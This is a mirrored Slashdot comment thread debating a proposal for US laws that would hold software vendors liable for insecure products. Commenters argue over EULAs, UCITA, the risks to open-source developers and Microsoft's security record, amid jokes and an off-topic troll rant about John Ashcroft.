Slashdot Mirror
Laws to Punish Insecure Software Vendors?
Gambit Thirty-Two writes "An influential body of researchers is calling on the US Government to draft laws that would punish software firms that do not do enough to make their products secure."
Yeah that'll work.
A visiting professor at the University of Alabama is giving a seminar on the supernatural. To get a feel for his audience, he asks:
"How many people here believe in ghosts?" About 90 students raise their hands.
"Well that's a good start. Out of those of you who believe in ghosts, do any of you think you've ever seen a ghost?" About 40 students raise their hands.
"That's really good. I'm really glad you take this seriously. Has anyone here ever talked to a ghost?" 15 students raise their hands.
"That's a great response. Has anyone here ever touched a ghost?" 3 students raise their hands.
"That's fantastic. But let me ask you one question further... Have any of you ever made love to a ghost?"
One student in the back raises his hand. The professor is astonished. He takes off glasses, takes a step back, and says,
"Son, all the years I've been giving this lecture, no one has ever claimed to have slept with a ghost. You've got to come up here and tell us about your experience."
The redneck student replies with a nod and begins to make his way up to the podium.
The professor says, "Well, tell us what it's like to have sex with a Ghost."
The student replies, "Ghost?!? I thought you said 'goats'."
Slashdot, come for the goatse, stay for the trolls.
What will this mean for open source? OSS companies/programmers will be just as liable as closed source ones.
So this means that if i configure my computer without a password i can sue the manufactuere for defective security in their software if it gets hacked.... Cool
</SARCASM>
I will bend your mind with my spoon
Aimed at Microsoft, George Bush's friends in Redmond. Asking for them and others to actually produce secure and reliable software, and making them responsible for their actions.
Sounds ridiculous that this shouldn't already be covered by things like Consumer Protection but in fact those licenses make sure that they have no responsibilities. And no-one is going to change that in the US when there is a president who doesn't want to prosecute for monopolistic practice the bigger violator of security concerns out there.
An Eye for an Eye will make the whole world blind - Gandhi
How do you quantify what is doing enough? If they release a patch in two weeks is that enough? How about 4? Is releasing a patch not enough? Should they actually call people and tell them to install a patch that has been out for months? I mean there is no doubting that Microsoft software has holes but they do patch them. The question is do the do it fast enough and do they make it required for users.
Be careful what powers you give to the government.
[ home ]
So, if a law like this is passed, will the people who break it be branded IT Terrorists? I mean, everything else is terrorism now, why stop here?
Oh goody, now software developers will be afraid to make good programs so now we will have a million half done unpublished programs. The only one that should be effected by this is Microsoft. Thats where the whole security problem is.
Gizmo
Linux, Solaris, HP-UX, MS WIndows and a bunch of other products have holes in them that SANS tells others about. Has there ever been a piece of software with no security holes?
Your software is insecure. Please pay your fine by credit card at http:// ...
Sigs are so 1990s. No way would I be seen dead with one.
It's always interesting when those who call for freedom and security for themselves can only figure out how to do it by reducing the freedom of others. Now they want to legislate software standards? Come on, you have to be against that.
I think I'll stop here.
If this passes, the first thing they should do is sue the entire internet due to its inherent open-ness - it just lends itself to insecurity.
Nope, not me, I must be someone else...
Reconsidering that plaintext cookie in my browser that holds my account password, are we?
--
What happens when you outlaw guns
This is definately a double edged sword. This could bite anyone on the ass. MS doesn't hold a monopoly on crap code (arguable). What happens to people who don't sell the software, but wrote and make money on its support? (I'm thinking of Apache here).
So.. if a company lobbies against this law, wouldn't that open them up to criticizm? I mean, it'd essentially be like them saying "we don't want to be responsible for our insecure software."
This raises some constitutional issues - Do I have the right of freedom of speech ( as code has been found to be in some cases ) to utter an incorrect program?
An additional question would be should all software now come with a warrently that specifically disclaims the implied warrenty and states that there is no warrenty? Would it be legal under the proposal?
There's a gorilla from Manilla whose a fella that stinks of vanilla and has salmonella.
Any computer anywhere can be hacked by anyone. The only difference between Grandma's computer holding her apple pie recipie and NORAD's computers storing the nuclear launch codes are accessibility.
Think about that the next time you champion the cause of punishing the programmers that make a piece of software...
I'm the tasty treat nobody can resist!
IM Me! AOL IM:Tasty Beef Jerky
Seems to me this will have the least impact on those who need to pay attention to security the most(large software companies) while having the potential to make it harder for the "little guy" to write and publish software.
No, Thursday's out. How about never - is never good for you?
And who would decide which software was 'secure' and 'non-secure'? What is secure to some, is totally insecure to others.
Anyone ever read their full End User Licence Agreements, especially MS?
It always has a limit that anything bad that happens while using their product is not their fault.
Now IANAL but I thought that by clicking I Agree, that you were actually agreeing to that.
I suspect that this would ensure far less software gets produced by smaller vendors and individuals who can't afford the liability.
Another good move for corporate America.
Microsoft is able to defend itself against the government. Are you?
My poetry site welcomes the unusual.
Possible options include steps that would increase the exposure of software and systems vendors and system operators to liability for system breaches," wrote the authors of the report.
maybe thats some incentive for the sysadmins to get off their a$$es and apply some patches which should have been applied a long time ago. Isn't that what they're paid for?
I hope that M$, as well as having to work out their other legal issues will do something about how their products can be easily 'hacked' into bringing things down.
Or they will make fewer things that would be in a position to be taken down (linux w/apache works, who needs a M$ server?)
I think I am asking too much.
But Windows XP is not the only Microsoft product with security failings.
For example Microsoft Bob.
I've been waiting for a service pack for it for years. I'm just not as comfortable hooking Bob up to the internet as I once was. Bob has gotten more viral infections than an old French Whore in a port town.
-Rothfuss
draft laws that would punish software firms that do not do enough to make their products secure
What, legally require things like DRM?
No, I know what it means. Who's going to check out all this software? Are we going to have a Federal Department of Bug-Finding, which employees 57,000 people trying to write Code Red 3?
How will this result in anything other than higher prices and no change in the "security" of software?
You are in a maze of twisty little passages, all alike.
BWAHAHAHAHAHAHAHA! http://www.sans.org/topten.htm
perhaps it would be better to spend time and money focusing on educating the people who run insecure software/hardware. i don't really know how you'd go about enforcing it except to hold people liable for any problems caused by cracked servers.
Imperium et libertas
Autocracy and freedom
Laws that make a vendor produce a secure and safe product should apply to software too.
Ford and GM shouldn't be allowed to produce cars that kill people, simply because they couldn't be bothered to make them safer - like exploding gas tanks - ok, so that's not such a great example... (grin)
But really, but the responsibility where it lies. If I put a system out on the net, and don't take some steps to make it secure, I should be liable for damages it causes when it's compromised. Same for SW companies. If you produce a product that doesn't meet the "reasonable" man test for care in producing the product, the maker should be liable for negligence.
I might go even further though, and add some criminal penalties too.
Software can be more reliable and bug-free and secure. (Go read the "Software Conspiaracy") Sure it will cost more, but what do you think all the virus outbreaks costs business and individuals. It's just a hidden tax. MS (and others) are just shifting the burden of producing software that works to the users. It's cheaper for MS to produce the software, but lots more expensive for the user to use them.
Finally, the legal system _IS_ part of the free market. The threat and actual loss of damages to a plaintiff balance the system of the market. It's not just buyers and sellers - and a wild wolly mess...
It just bugs me when "free market" proponents want to proclaim that the courts are unneccessary in the free market - bull! They are important and the market will not function correctly without them!
I think a much better approach would be if companies had their software certified as secure. Just an independent group to come in and audit the release at varying levels of bulletproofedness.
It'd drive up software costs, but if consumers don't care to look for the "Certified Secure!" brand, why should the government force it?
I'm afraid that would go too far in the opposite direction. Let the consumer punish the software manufacturer for bad security by not buying said product (i know, this doesn't really work when monopolies are involved), don't get the government involved. I think this is a little like cutting off your head to spite your nose, or however that saying goes. I fear what this proposed law would do to OSS. Instead of this, why not just modify the DMCA and such so that stupid software vendors can't prosecute/persecute people who try to show the security flaws in their crap sofware. It really gets me miffed when companies (*COUGH*microsoft*COUGH*) try to cover up for their poor code by making "security" a four letter word. What utter flipping nonsense.
Do they really think more regulation is going to improve software? All this will do is make companies put time and effort into "compliance" instead of fixing problems users are asking for
Free cell phone tracking
Sarcasm [mode on]
Luckily, Microsoft has never, ever neglected security issues. Their completely clean legal standing attests to that.
The US National Academy of Sciences (NAS) has released drafts of a report commissioned after 11 September to look at the state of America's computer systems.
If the USA Patriot Act could get passed after 9/11, so could this. Let's not forget that rationale goes the way of the buffalo in the months following an attack. And while I think a lot of software would be better than it is now if it were more secure, this wouldn't just affect MS.
Let's hope nothing comes of this, as it could mean lawsuits against anybody and everybody if any piece of data becomes available to the wrong party.
While the concept to "punish" vendors for flawed products is a good one, trying to get the _government_ to do it is a bad one. For one reason, the government is very easily corrupted, and often looks the other way.
A better solution is to allow people to sue software companies that produce software that does not do what it is supposed to do. For example, if Microsoft says they have the most secure servers on the market, they damn well better be that.
As soon as a few lawsuits are filed, things will change for the better. There's too much being "protected" by microsoft software for them to continue business-as-usual for long if they get sued for every nimda/code red/etc out there doing damage.
However, if the company puts out patches (such as through windowsupdate) and the user fails to apply them in a timely manner, it's the user that screwed the pooch, not the producer.
Its got a nice buffer exploit that is being ENTIRELY ignored today on /., because, hey, unix is perfect, right????
Where laws are concerned one must always tread carefully. What they are proposing is criminal penalties for security flaws. Imagine if the authors faced liability for writing ftpd with back dores in it. Whould people still be willing to write free software if that little disclaimer doesn't work any more?
There is a long history of laws (e.g., Sherman Act) designed to limit corporations but instead limit individuals.
Trusty ol' Beeb.
I'm guessing you won't see this mentioned in any of the major U.S. media outlets, though.
Probably for the same reason the media never mention the fact that all those virii almost always affect only Micros~1 Windows users.
I'm not talking about an assumption by the media that everyone uses Windows. My guess is that even the threat of a lawsuit from the world's richest man is enough to keep things like this out of the papers. Not to mention all those advertising dollars.
We really need fair competition in computer software again. If there were reasonable alternatives (yes *we* know there are, but most companies are pretty clueless wrt actual computer-based solutions), there would be NO NEED for this law, as the better software *should* do better in the marketplace.
academicians who are, as usual, out of touch
with the "real" world.
Thanks in advance,
Trying_to_keep_the_U.S._John_Katz_free_free_for
more_than_2_years-spork.
Not to sound insensitive to the software security issue, but going down this path simply encourages massive efforts at hacking one camp's software to further one's own favorite.
Yes, people already do this, but to bring in the Gov't to be manipulated by these whims seems silly. Be responsible for your own security.
Ya Sure! You Betcha!, The_THOMAS
There is another angle on this story provided by the register in this article that talks about UCITA (Uniform Computer Information Transactions Act) currently under consideration by a number of states. It would add a notion of implied warranty to all software including open source. The point of view taken by the the Register is that these warranties would discourage volunteer contributions to open source projects because possible legal penalties (independent of whether the software was sold for money) would fall back on the developers. Of course, it is hard to imagine that closed-source companies would be in favor of implied warranties, but the Register's perspective is thought provoking for open source.
"Yeah, that'll work"? What do you mean by that, CmdrTaco? Is it sarcasm? Are you saying that laws drafted to enforce software security are bound to failure because software security is inherently difficult and all-to-easy to overlook? In that case, shouldn't Microsoft be cut a little slack for their recent security shortcomings by this standard? Oh, my bad. Microsoft == bad. I forgot I was reading /.
-------------------------
Stupid people suck.
How about laws to punish the vendors if they sell products that simply are full of bugs, crash all the time, but don't provide adequate support or fixes to their products (free of upgrade fees)? Security is just one problem. Let's get working software first.
That is unless of course the insecure products are made by an monopoly that illegaly prevents competition .... but that's another story.
Translating this to the software world, frankly, makes my head explode just thinking about it. Consider:
I can see, perhaps, a public standards body to which software vendors could choose to submit their products. In this scheme the government could award some kind of 'certification label' that a vendor could use on their packaging, etc. indicating it's 'safe'. That would at least enable the marketplace to decide the importance of government certification. However, we'd still be left with the niggly questions of what 'safe' is and how we might determine 'safeness'. Maybe this akin to 'quality' certification along the lines of ISO9001/2 processes(??).
CrazyLegs
"Pork!!" said the Fish, and we all laughed.
At first glance this seems aimed at Microsoft but it could have severe impacts on free software unless liability is limited to the price of the software for example. I think an argument for an exemption of open source could be made based on complete disclosure. This could have an interesting impact on free (as in beer) software though.
If a safe maufacturer makes a safe advertised as the "Fort-Knox" of safes, but there is a glitch that allows anyone to toggle the handle 3 times and Voila it opens, guess what its defective and depending on the result of that safe being opened they can be held liable, IF they were aware a problem exists.
Software vendors selling CRAP any 12 year old script kiddie can comprimise NEED to be held accountable. XP Flaws, hell almost ALL windows security flaws are nothing more than a piss poor product. Needless to say you dont ever see life support equiptment running off windows, unix , yes. windows, no....
But aside from my MS bash, this could have negative reppurcussions as well, Open Source software is EXPLICITLY offered with no suitablity clauses, no warranty clauses etc, commercial products cannot do this, under the laws that govern this in the US at least, there is an apperance of support for commercial software, that is ENOUGH , even if they throw no warranty clauses in it. For example even under Lemon Laws for used cars , a dealer says AS IS NO WARRANTY, but on the window advertises ONE OWNER, that ONE OWNER statement im most states costitutes an implied warranty (Ive pulled this card and won so dont tell me it dosent). It may see a serious quash in innovation for commercial products.
There is more software than the OS itself, look at checkpoints flaw, they tout their software as secure , secure , secure, but then it turns out it has holess, just like any other. Guess what its a product defect, and hence they could be sued for damages, lets make those penalties MUCH STIFFER !
Open source also has the MAJOR advantage of extenive peer review, but that dosent always work either, sendmail, dns, apache, all have been comprimised at some time or another over the last few years, BUT they are opensource, and the USER HAS the ability to correct the problem themselves, not rely on a hodge podge commercial patch roll.
The COMMERCIAL software vendors need to be held accountable for product defects JUST as manufacturers of hard goods are.
Sig went tro...aahemmm.....fishing........
If they mean unhackable their not going to get very far. Some I don't think these people are going to be successful in getting these laws passed.
Why not, if you get a non-functional/debilitated automobile in most states the dealer is required to buy it back if they can't fix it quickly. If they can however, you keep the fixed car. What a concept!
These laws need to be aimed at software vendors who are irresponsible with their handling of security issues. Everything has security issues. laws direccted at vendors with security holes would screw alot of people over. The handling and fixing of security holes should be somehow controlled. If there is a Root exploit in my box, and it takes the vendor 4 weeks to tell me and another 1 week to release a patch then they should be held accountable. However, if the vendor as soon as they find out send out an advisory and release a patch as quickly as possible (or a solution to remedy the problem) then they should be safe. Laws like these sound good. But im starting to get scared. The legislative body has shown an incredible ignorance towards computing thus far, what makes this case any different/
--------========+++Dont Feed The Lab Techs+++========--------
to ban open source and free software. Here's
why:
My complaint about John Ashcroft
May I be cynical for a bit? I hope you don't mind,
but with Ashcroft's latest barrage of
malodorous notions, I can't resist the urge to make a
few cynical comments. To get right
down to it, some of the facts I'm about
to present may seem shocking. This
they certainly are. However, it's time that a few
facts had a chance to slip through the fusillade of hype.
What's my problem, then? Allow me to present it
in the form of a question: Where are the people
who are willing to stand up and acknowledge
that Ashcroft, in his infinite wisdom, has decided
to destroy the natural beauty of our parks and forests?
On the surface, it would seem to have something to do
with the way that his whole approach is repugnant.
But upon further investigation, one will find that
by allowing Ashcroft to put mephitic thoughts in our
children's minds, we are allowing him to play puppet master.
As for the lies and exaggerations, Ashcroft's
epigrams are rife with contradictions
and difficulties; they're entirely maladroit,
meet no objective criteria, and are unsuited
for a supposedly educated population.
And as if that weren't enough, if Ashcroft is going to
obstruct important things, then he should at least have
the self-respect to remind himself of a few things: First, a
true enemy is better than a false friend. And
second, many people respond to his debauched vituperations
in much the same way that they respond to television
dramas. They watch them; they talk about them; but
they feel no overwhelming compulsion to do anything
about them. That's why I insist we pronounce the truth
and renounce the lies.
Even people who consider themselves scornful
foolhardy-types generally agree that Ashcroft's slurs
symbolize lawlessness, violence, and misguided rebellion
-- extreme liberty for a few, even if the rest of us
lose more than a little freedom. One might conclude
that Ashcroft is incapable of writing a letter without using
such phrases as "crapulous pop psychologists", "loquacious
exhibitionists", "oppressive personae non gratae", or
some combination thereof. Alternatively, one might conclude
that Ashcroft has a different view of reality from the rest of us.
In either case, if you're not part of the solution,
then you're part of the problem. His historical record of
fickle pleas is clearer than the muddled pronouncements
of his apple-polishers for a variety of reasons. For
instance, the worst sorts of inconsiderate Neanderthals there
are must be treated with political justice, not with
civil justice, as they are sincerely not real citizens. Let me
rephrase that: I wonder if he really believes the
things he says. He knows they're not true, doesn't he?
A complete answer to that question would
take more space than I can afford, so I'll have to give
you a simplified answer. For starters, if
we let him cause riots in the streets, then greed,
corruption, and tribalism will characterize the government.
Oppressive measures will be directed against citizens.
And lies and deceit will be the stock and trade of the
media and educational institutions.
Even Ashcroft's bedfellows couldn't deal with the full impact of
Ashcroft's refrains. That's why they created "Ashcroft-ism," which is
just a garrulous excuse to force square
pegs into round holes. He plans to drag everything
that is truly great into the gutter. He has instructed
his votaries not to discuss this or even admit to his
plan's existence. Obviously, Ashcroft knows he has
something to hide. Most of you reading this letter
have your hearts in the right place. Now
follow your hearts with actions. I have traveled the length and
breadth of this country and talked with the best people. I can
therefore assure you that Ashcroft's artifices cannot stand on
their own merit. That's why they're dependent on elaborate
artifices and explanatory stories to convince us that Ashcroft's
warnings can give us deeper insights into the nature of
reality. We can and we must protect ourselves by any means
necessary against the unrestrained bestiality
of stupid, quasi-macabre paper-pushers. And that's the honest truth.
Great, now when I want to release some software, it'll have to get it licenced, and certifed by some agency. It bet the "software review" will be just like an IRS audit. Then ofcourse you'll get black market software, from the GNU, that will put you in jail if Microsoft finds out you're using it.
Linux is NOT immune to exploits coming out of the box. In fact, IIRC there were versions of Redhat that came with a lot of services enabled in a default config that could lead to even easier entry than a lot of Windows systems. Of course, it's since been corrected, but the point is that it does and can happen. Also, when people run apps as root, what else can you say but to say that people are stupid. Still, at least I can recompile my kernel to permanently disable the better chunk of the holes.
Well, providing that something like this has a chance of getting passed...
What are the odds of if being inforced on large corporations? Microsoft has been fighting the anti-trust case for how long now? Lawyers have a way of interpreting anything that's not very carefully worded any way their company wants.
Besides, I'd imagine that the wording of the rules would allow for unknown vulnerabilities. You can't really punish soneone for a simple mistake. Yes, more than one of MS's security holes has been known by MS for longer than publicly known, but will they admit that they knew? Somehow I doubt it.
And what about patches? The laws would have to provide the company to release a patch to solve the security problems. And in that case, whose fault it is when Code Red hits your company's web server? It is the corporate megalith that released a bad piece of software, but provided a patch to solve this particular problem, or is it the lazy/incompetent sysadmin who didn't bother to keep his system up-to-date?
Now what about your everyday programmer? He contributes to an open-source project. A flaw is discovered, now who do you blame? The company who made the software? There may not be one. The organization? The guy who wrote that exact piece of code?
Besides, an open-source program that isn't kept up-to-date can have as many flaws as a program made by a large company. Again, it comes down to keeping current. And I don't expect my mother to update her Windows(R) unless I call her and tell her to.
Yes, I believe that Microsoft has released some gaping holes into the computing world, but the problem is going to be placing blame. And for the law to decide at what point it becomes so blatant that you can hold the software creator responsible.
And real basic liability -- their product does what their marketing claims say it will, or they fix it or take it back and provide some kind of refund.
I'm willing to accept that it may have defects that may cause problems, but the defects in the software should be fixable by the vendor.
I'm not willing to accept that the product has so many defects that it does not do what is claimed. I call that fraud.
This is bad news for anyone dabbling in software development, you make a piece of software to do something (in your opinion) useful, release it on your website where a few dozen download it, it spreads a bit more, and suddenly, someone somewhere does something that provokes your app to crash, or be used, in a nasty way taking out their box and the boxes on that network.
Now you suddenly find yourself with a fresh lawsuit in your mail claiming you're responsible for the couple hundred thousand dollars worth of damage done to a company in some remote place you've never heard of...
This sounds like an excellent way to deter anyone from ever releasing anything that's not tested and tested again, meaning development for a hobby will be a lot tougher.
I see a suggestion like this working only after a developer clearly states and guarantees that his software will not in any way harm the users equipment, or, very gross neglect from the developer and failing to provide even rudimentary security.
Wax-Museum Fire Results In Hundreds Of New Danny DeVito Statues
n/p
[ home ]
its called the Free Market. Darwin wrote the laws a long time ago.
"i was saying gnu-rd"
The problem with security is not illegal hacking, its just that we don't have enough laws! They can make laws all day, but something will always be cause for a security hole, no matter what extremes programmers go to... Its the nature of the business. The criminals are not the software developers (and not Microsoft, in this case), I think this should be obvious.
Ford can take all measure to make their vehicles safe, but if I drive down the road at 50 mph into a telephone pole I still may die. Is that Ford's fault? I think this idea is ludicrous.
[FromTheMorning]
Isn't this what the SSSCA is all about?
SSSCA == Security Systems Standards and Certification Act
The governmet legislation won't set standards. (Though if, as I propose, it makes a criminal standard it would.)
It makes possible to sue the maker in CIVIL court. The only "standard" is the reasonable man test. Bsically, right now, it's nearly impossible to sue software makers for bugs/defects. The proposed changes, as I read it, make it possible to take the SW maker to court to sue for negligence or making a defective product.
The same kind of laws should apply to software that apply to many other goods, though we might need some modifications.
This is what's so BAD about UCITA. It eliminates all of the "goods" style protections for software, and makes the sale a contract.
Software sales need to be moved four steps back to a sale of goods style sale. That will add back in protections and such that are available when you buy goods.
If we sold lawnmowers like software, you could buy a lawnmower, and it doesn't even run - or even wasn't capable of cutting grass in the basic design. Want your money back? NO! You pushed the lawnmower, so you can't have your money back. Sheesh - software can meet nearly all the terms of a "Goods" sale, and classifiying them as "Non-Goods" is just a great way for the manufacturer to avoid taking responsibility for what they produced!
What if Linus got hauled into court after ext2fs ate someone's data?
Best Slashdot Co
The software producer's liability should be limited to the amount of their financial return on the software, except in cases where gross negligence is apparent. If I never made a dime of the sale of the software, I should be liable only for that $0.
Wow, quite a little tirade there.
Here's a little hint - let the free market system deal with it. That's how things are done in the US. If people don't think Microsoft is secure (as opposed to the _wonderful_ security history Unix vendors have had - please note dripping sarcasm) then buy other products.
Here's another little hint - your buddies at Sun just fell victim to a Solaris security hole
Open source developers face new warranty threat
Rosen and Kunze were attempting to secure an exemption from implied warranties of merchantability, fitness, or non-infringement for a computer program, "provided under a license that does not impose a license fee for the right to the source code, to make copies, to modify, and to distribute the computer program."
The proposal would have brought the rest of the States in line with Maryland.
The replacement version, which reads "or to distribute..." is joined by a provision that nullifies the exception for software licensed to consumer
The complete text can be found here....
a) Except as provided in subsection (b), the warranties under Sections 401, and 403 do not apply to a computer program if the licensor makes a copy of the program available to the licensee in a transaction in which there is no contract fee for the right to use, make copies of, modify, or distribute copies of the program.
(b) Subsection (a) does not apply if the copy of the computer program is contained in and sold or leased as part of goods or if the transaction is with a consumer licensee that is not a software developer.
...I would rather have the freedom to tell the big guys to screw off and go write my own free secure system with my buds, than to have to do my business with them or not at all because no one else (read: me, smaller vendors, etc.) can afford to meet the requirements of this law.
[ home ]
God forbid this ever gets put into action. Most knee jerk MS haters will say this is good thing, but it isn't. When Joe Schmoe loads up an open source program and gets hacked because he was ignorant of security issues then what? IIRC, ignorance of the law doesn't mean you can get awy from it correct? So, because some idiot doesn't know proper security, you are going to slam the guy or gal that made the software? Ludicrous. Besides, NO ONE can make software that can't be hacked. If you can, then maybe you should go talk to MS :)
Sent from your iPad.
The all mighty M$ will just use there standard ULA loop hole. I see it like this.
M$ holds no responablity to the public or private use of the software about to be installed. If a security flaw is found, we at M$ hold no responablity and cannot be sued for any reason. If the prople presists, follow the next step.
Start, Settings, Control Panel, and then click on add/remove programs and then remove the offending program.
If the program does not uninstall at this time, please format your hard drive or any other media that the offending software was installed on.
If you agree that you cannot sue M$ for any reason please press the agree button, otherwise press cancel.
------88-------- Sig? Sorry, I don't smoke.
Do you really think that if this becomes a Bill with any serious chance of passing Microsoft won't have lobbied sufficiently to get it to pose a threat to its most serious competition? (Linux and OSS)
The market should work this issue out on its own if it is healthy.
If organizations want higher security, they won't buy the insecure products. Business that have been burned by Outlook/IIS/Windows in the past will move to alternatives: GroupWise/Apache/*NIX.
obviously no deficiencies vs. no obvious deficiencies
So now I can sue GM because someone stole my car. I can sue the cops for not being able to protect my car from thiefs. I can sue the WTC architects because it wasn't secure enough.
A whole range of new lawsuits coming along for ambitious lawyers.
If laws are drafted that require a company be held financially (or possibly criminally) responsible for insecure software how would you deal with systems such as linux? One solution is to ban them all together, if no punishment can be levied (because there's no company) then the product violates the law and cannot be distributed.
Also, how would this law affect the 800 page EULA that comes with every piece of purchased software? The way those agreements are worded the software could take over your computer and cause it to eat your face and the vendor could not be held responsible.
What I do want is to KNOW when a supposedly secure product has a security leak. Moreover, I want to know the ramifications of the issue, the patch progress, and current known virii/worms/other explotations roaming around.
I really don't want to sue company X for making insecure software -- but I don't like the idea of them holding back on vulnerability announcements one they've been exploited.
That's ridiculous, how many times have you heard of a commercial company being liable for crappy products? How many products have MS released that have NOT worked as advertised, yet required consumers PAY to upgrade to a version that should have worked to begin with?
Besides that, all the software licenses (shrink wrap or no) basically say "we're not responsible".
Stupid sexy Flanders.
What about freeware or opensource software? If I get something for free and it's broke who am I to complain?
What will happen to people who release buggy software that's exploitable? Fines, throw 'em in jail to rot - or force them to stop making any more software to save the rest of humanity?
Man makes software, man travles to USA, software is exploited, man is arrested and left in jail for months.
I'm not against legislation for a company that forces it's software on people for the "low low price of only 199$" and then says "duh, read the EULA" when it's buggy and/or doesnt work as it should, but dont jump on this as the way the world should be. You dont have to use Microsoft software, and if you do you should know to protect yourself, not sue when something doesnt work the way you want it to.
A company that thinks this is the way to fix bugs...I have no words.
Anataka suki desu. Itsumo. Itsumademo.
I do think companies like Microsoft need to take more responsibility for the huge gaping security holess in their products but I'm not legislature is the right way to go about it. I do think consumers need to be better informed. When a Ford recalls a few vehicles over some potential saftey hazzard it's all over the evening news. But what about when a dangerous security hole is found in the world's most used operating system? The vast majority of users never even know about it.
Whatever happened to the good old days, where if a product was notoriously unsafe and insecure, that consumers simply refused to buy the product? The manufacturer's only choice then was to either fix the problems, or cease production.
If we bought cars with the same lack of discern that we buy software, Chevrolet could bring back the Corvair.
Already a member of the Green Party, thanks.
Be careful what powers you let corporations have when you let them run amok without government regulation.
Remember "Bring 'em on"? *sigh
So would it be legal to hack again? Or would hacking a system to prove it's insecure cancel the other one out.
Should some massive security hole be discovered in Linux, FreeBSD, or other simular free operating systems, the law would most likely be in-effective in punishing anyone.
This could create a big loophole for Microsoft if they ever decided to evade the law by opening up Windows. But of course that is unlikely.
As for getting the law its self passed, it really depends on who has more influence on the law makers? Does Microsoft really have more influence with US lawmakers then their customer base?
END COMMUNICATION
I'm a windows programmer. I've done a number of server-based products for companies that have either deployed them in-house or licensed the product to other companies.
I do my best to prevent buffer overflows, and do robust error handling. I also, however, use third-party code.
So in this case, I'd have to increase my Errors and Ommissions insurance coverage, I'd have to audit all third-party code for security.
Of course, I'm still fucked since the OS vendor cannot even produce a C runtime that does not include buffer overflow problems.
Fuck programming, I'll work retail.
. . . we might want to consider that while "security" can mean keeping your machine from being 0wn3d, it can also mean "security" as in the Security Systems Standards and Certification Act, otherwise known as the "Enforced Copy Control and Free Operating System Elimination Act."
CEE5210S The signal SIGHUP was received.
Be careful what powers the governments assigns to its proxies.
...
Such as special dispensations to ignore normal contract law by selling "licenses", such as copyright, such as patent,
*Real* libertarians aren't as one sided as you seem to be. They actually believe in fewer laws of any kind, not just fewer of the kind favorable to their favorite soapbox.
Infuriate left and right
I hear a lot of people happy about the idea of going after M$ because they are the Evil Empire. I also hear a lot of people that are afraid of us open sourcers being attacked. Obviously, more secure and better written code should be standard.
I'm not so sure that liability isn't a good thing. I'm not saying that a programmer should be completely responsible for his/her code and any results that occur. I can instead think of a different situation. Imagine I produce a piece of software and sell it/give it away. I don't think it's a bad idea for me to be required to:
Now, of course end users will be responsible for installing patches, monitoring CERT advisories, etc. The end users are also responsible for attempting to avoid known bugs while waiting for a patch to become available. But, sometimes this isn't avoidable (think power generation system). If this particular bug is the cause, then by all means I think the users should be able to go after the company they PAID for damages. It's not like the software company didn't charge the end users to use the software. With those software rights, there really should be some sort of software liability (just like if I made a defective car, and then had to do a recall).
Long, cute, or funny Sigs are just another form of over compensation, used by geeks, nerdz, etc.
--
Damn the Emperor!
The researchers have good concerns and the idea isn't inherently bad. It's what happens between politicians and in the offices that worries me. What starts out as a way to make companies more responsible easily slips into quick sand. How in the world do you enforce security and by what standard. You can't say it's just about making it so consumers can sue big corporations, without a meaningful discussion about what constitutes good security in the first place.
Maybe instead of bailing out the airlines we should have fined them for making their planes and airports insecure...
www.lonseidman.com
It seems awfully excessive for this law to apply to ALL software. Applying this law to mission-critical enterprise server software makes a great deal of sense. Applying it to a small program like a text editor would be outrageous.
Also, will this law apply to consumer software as well as corporate software? If somebody hacks into my computer through a chess program that I'm running on Windows 98 while I'm connected to the internet, that doesn't constitute a breach of national security. If some cyber-terrorist breaks into the White House enterprise server and starts deleting critical government files, that's a different story altogether.
I'm betting that due to M$'s lobbying, this won't pass. After all, Gates' good buddy Dubya (George W. Bush) can veto any law that he wants, even if it managed to pass both houses of Congress. M$ would go out of business if this bill became law and were properly implemented. That's why it won't pass.
This space left intentionally blank.
Before you make such a half-ass guess at what "secure" means, why don't you read the article, which clearly points to the former, or "being 0wn3d" as you so cleaverly put it.
karma is for the weak >)
This would just impose another barrier to companies accepting open source software..
"What? It isn't Certified Secure?? Better go with Microsoft..."
And if course most OSS authors wont have the money to get the certification..
That sound like a good idea at first, except that the whole issue of "secure systems" then gets turned over to lawyers for resolution. For the small development shop that translates to more money out the door for legal fees.
Taken one step farther, suppose that there is a large software developer with in house lawyers and a bottomless bank account. Now if this law was on the books, this developer could use that law to bludgeon smaller shops to death with their lawyers in the endless persuit of "secure systems." They would probably even get some good PR out of it, what with them protecting all the end users from "insecure systems."
No, somehow this doesn't seem to be a workable idea.
They could have a warning on on the media or something to be read when installing it that it is not work. Kinda like the warning that tobacco is bad for you.
This is another one of those catch-all blanket decisions that seem alright at first thought but if you apply to all cases, you see that it is just disastrous. Let's look who it affects the most
BETA SOFTWARE
Well of course that has bugs. So we exempt this? OK, all (Microsoft) software will be beta
NEWBIE / EDUCATIONAL
Some newbie developer or uni student writes a piece of toy software and makes it available on his home page to boost his ego. Some other newbie academic downloads it and a bug in the "file manager" software deletes his C: drive.
Exempt educational software??
FREE BEER
Some people make software out of the goodness of their hard. "YMMV, maybe you like it maybe you don't. No warranty". Maybe it is superb. But it might have a horendous bug. So people will no longer release freeware
OPEN SOURCE
Same as above but with source open, people can deliberately find bugs and cry out. Worse, there is plenty of open source software in commercial use (Apache etc). What if in some new iteration of Apache, there is a security hole and this will happen. Can people sue for this?! Can people sue the developers who worked on it for free? What exemption do you want now?
MICROSOFT
Well, by now, OSS has dried up because everyone is too scared to give work away. Maybe top projects that have been so heavily scrutinised in the past might be ok (Apache, Linux Kernel). Microsoft might just last a little longer than expected due to security through obscurity but of course they too will perish
The end of software =)
After the US government begins its new laws in the area of data and intellectual property, i have some more they could add:
1. The Crap Film and Television Act, will hold film-makers responsible for bad productions, bad acting, bad lighting and poor scripts. If someone passes out from bordom from watching a film, they can sue the studio.
2. The Invasive Pop-up Advertising Act, will ban all pop-up adverts. This will tie-in with the software laws, because pop-ups are technically software, and are insecure (in that they cause damage to my mouse).
3. The Insecure Boy-Band Act, will ensure that all boy-bands are securely locked-up. If a record company tries to bring them to a studio or gig, they will be punished.
This comment does not represent the views or opinions of the user.
What's "cleaverly?" Does that mean something releated to Ward Cleaver, the patriarch of the television classic "Leave it to Beaver?"
CEE5210S The signal SIGHUP was received.
Are they serious? Can Clippy spread a virus? I never heard of that.
Ahhhh he's coming out of the computer....
- adam
Think carefully... how do you make software secure in the first place? Microsoft try to go through extensive software testing to detect bugs. Who knows, maybe if test software is good enough, they can catch most bugs
How does the OSS world make its software so secure? Through peer review. People find bugs and report them. With OSS these bugs are found fast. And these bugs get fixed fast. But what would be ludicrous would be to sue for bugs since at V1.0.0 there are bound to be bugs. Suing would kill the project. Peer review has made OSS strong and that is the way it should be.
